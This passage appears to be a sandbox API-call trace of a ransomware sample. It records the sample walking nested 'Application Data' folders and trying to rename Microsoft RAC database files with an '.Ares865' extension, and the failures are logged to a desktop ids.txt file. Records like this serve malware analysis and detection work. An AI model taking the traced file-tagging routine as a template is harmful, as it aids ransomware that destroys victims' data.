ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.227] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.227] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2288 [0079.257] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 100 [0079.257] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.288] GetLastError () returned 0x20 [0079.288] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 122 [0079.290] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 122 [0079.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.290] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3091 [0079.290] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x7a, lpOverlapped=0x0) returned 1 [0079.291] CloseHandle (hObject=0x12c) returned 1 [0079.291] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.291] CloseHandle (hObject=0x0) returned 0 [0079.291] CloseHandle (hObject=0x0) returned 0 [0079.291] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.291] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 107 [0079.291] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.292] GetLastError () returned 0x20 [0079.292] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 129 [0079.292] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 129 [0079.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.292] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x310b [0079.292] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x81, lpOverlapped=0x0) returned 1 [0079.292] CloseHandle (hObject=0x12c) returned 1 [0079.292] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.292] CloseHandle (hObject=0x0) returned 0 [0079.292] CloseHandle (hObject=0x0) returned 0 [0079.292] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.292] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.292] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2628 [0079.323] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 117 [0079.323] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.324] GetLastError () returned 0x20 [0079.324] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 139 [0079.324] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 139 [0079.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.324] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x318c [0079.324] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x8b, lpOverlapped=0x0) returned 1 [0079.324] CloseHandle (hObject=0x12c) returned 1 [0079.324] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.324] CloseHandle (hObject=0x0) returned 0 [0079.324] CloseHandle (hObject=0x0) returned 0 [0079.324] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.325] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 124 [0079.325] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.325] GetLastError () returned 0x20 [0079.325] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 146 [0079.325] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 146 [0079.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.325] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3217 [0079.325] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x92, lpOverlapped=0x0) returned 1 [0079.325] CloseHandle (hObject=0x12c) returned 1 [0079.325] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.326] CloseHandle (hObject=0x0) returned 0 [0079.326] CloseHandle (hObject=0x0) returned 0 [0079.326] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.326] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.326] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0079.374] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 134 [0079.374] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.374] GetLastError () returned 0x20 [0079.374] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 156 [0079.374] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 156 [0079.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.374] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x32a9 [0079.374] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x9c, lpOverlapped=0x0) returned 1 [0079.375] CloseHandle (hObject=0x12c) returned 1 [0079.375] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.375] CloseHandle (hObject=0x0) returned 0 [0079.375] CloseHandle (hObject=0x0) returned 0 [0079.375] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.375] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 141 [0079.375] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.376] GetLastError () returned 0x20 [0079.376] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 163 [0079.376] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 163 [0079.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.376] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3345 [0079.376] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xa3, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xa3, lpOverlapped=0x0) returned 1 [0079.376] CloseHandle (hObject=0x12c) returned 1 [0079.376] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.376] CloseHandle (hObject=0x0) returned 0 [0079.376] CloseHandle (hObject=0x0) returned 0 [0079.376] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.376] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.376] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2268 [0079.422] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 151 [0079.422] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.422] GetLastError () returned 0x20 [0079.422] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 173 [0079.422] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 173 [0079.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.423] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x33e8 [0079.423] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xad, lpOverlapped=0x0) returned 1 [0079.423] CloseHandle (hObject=0x12c) returned 1 [0079.423] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.423] CloseHandle (hObject=0x0) returned 0 [0079.423] CloseHandle (hObject=0x0) returned 0 [0079.423] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0079.424] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 158 [0079.424] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.424] GetLastError () returned 0x20 [0079.424] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 180 [0079.424] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 180 [0079.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.424] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3495 [0079.424] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xb4, lpOverlapped=0x0) returned 1 [0079.424] CloseHandle (hObject=0x12c) returned 1 [0079.424] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.424] CloseHandle (hObject=0x0) returned 0 [0079.425] CloseHandle (hObject=0x0) returned 0 [0079.425] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0079.425] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0079.425] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0079.467] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 168 [0079.467] MoveFileExW (lpExistingFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\documents and settings\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0079.467] GetLastError () returned 0x20 [0079.467] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 190 [0079.467] lstrlenA (lpString="[ERROR] C:\\Documents and Settings\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 190 [0079.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0079.467] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3549 [0079.468] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xbe, lpOverlapped=0x0) returned 1 [0079.468] CloseHandle (hObject=0x12c) returned 1 [0079.468] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0079.468] CloseHandle (hObject=0x0) returned 0 [0079.468] CloseHandle (hObject=0x0) returned 0 [0079.468] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, 